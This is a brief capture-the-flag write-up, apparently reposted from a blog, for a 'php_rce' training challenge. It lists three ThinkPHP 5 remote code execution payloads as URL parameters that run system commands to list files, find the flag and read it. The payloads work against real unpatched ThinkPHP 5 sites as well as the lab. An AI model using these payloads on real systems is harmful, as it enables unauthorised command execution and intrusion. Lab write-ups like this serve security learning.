World -web- master advanced offensive and defensive zone 003-php_rce

1.thinkphp5 rce vulnerabilities , configuration payload ,

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27

 

 

 

2. Looking for flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("find / -name 'flag'");%27

 

 

 

3. Check flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat ../../../flag");%27

 

 

 

4. Vulnerability Details to view, https: //blog.csdn.net/qq_40884727/article/details/101452478

 


 

Guess you like

Origin www.cnblogs.com/joker-vip/p/12468769.html